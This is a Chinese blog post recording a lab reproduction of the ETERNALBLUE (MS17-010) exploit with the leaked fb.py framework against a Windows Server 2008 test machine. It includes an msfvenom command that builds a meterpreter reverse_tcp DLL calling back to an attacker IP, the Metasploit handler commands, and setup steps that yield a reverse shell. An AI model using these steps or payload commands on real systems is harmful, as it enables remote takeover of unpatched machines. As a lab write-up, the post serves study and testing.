ETERNALBLUE 本地復現記錄

昨天朋友圈都熱鬧起來了,原因是因為一個名為:ETERNALBLUE(方程式)的「0day」。

其實這個已經不是個0day了,因為補分漏洞微軟在三月份的時候已經發布了補丁(e.g. MS17-010)。

漏洞影響:2000/xpSp0/1/2/3/2003Sp0/1/2/3、VistaSp0/1/2/2008Sp1/2/xp_x86Sp0/1/2/3xp_x64Sp1/2/2003ServerSp0/1/2/Server2008Sp0/1/2/win7Sp0/1/Server2008R20/1/Win8Sp0/Server2012Sp0

利用條件:開啟了445埠即可。

下載地址:x0rz/EQGRP_Lost_in_Translation

0×00 本機環境:

1.win7 x86 (32位)攻擊機1

2.kali 攻擊機2

3.win server2008 enterprise x64 靶機

首先下載python環境(2.6)版本,下載好了之後設置系統變數。

接下來需要修改一下fb.py的一些代碼。

第一步:將fb.py的26-28行代碼以及72行代碼注釋掉。

接下來下載pywin32。

下載地址:Python for Windows Extensions

我們需要選擇對應自己系統以及Python版本的,這裡我選擇的是win32-py2.6的。

第二步:在windows目錄下建立一個名為listeningposts的文件夾。

運行fb.py,以下截圖僅為一些關鍵截圖,需要用戶自行設置的,其他地方直接回車即可。

Target IP:這裡填寫靶機IP

Callback IP:這裡填寫攻擊機1 IP

第三個記得輸入no 。

這裡第一次使用請選擇3:Create a New Project,因為我已經使用過了,創建過項目了 所以就不重複創建了,最後一個需要選擇no。

這裡輸入Yes或者直接回車。

到了這步就可以不需要管攻擊機1了,現在轉到攻擊機2,用MSF生成一個惡意dll。

命令如下:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll

LHOST:Linux IP

LPORT:自定義埠

/opts/s.dll:這裡是你的惡意dll路徑及名稱

可以看到已經生成好了,將惡意dll拷貝到攻擊機1上,等會會用到。

接下來進入msfconsole。

use exploit/multi/handler

set lhost LINUX IP

set lport 剛剛的自定義埠

exploit

完成這些操作後即可返回至攻擊機1進行下一步操作。

這裡插入攻擊機1的惡意dll文件。

到了這步之後 MSF會反彈一個shell回來。

這裡被重置連接了,是因為SSL的原因,但是已經測的漏洞存在,且反彈成功。

出現SSL錯誤的處理方法:

msfvenom的請求需要reverse_tcp模塊才能收到。所以需要set payload。具體設置如圖。(64位)

32位的則不需要set payload。

僅以此篇文章記錄解決問題的過程。轉載請私信作者。
推薦閱讀:

黑客們,你們挖洞是如何進行的?
滲透測試,你真的會收集信息嗎?

TAG:渗透测试 | 网络安全 |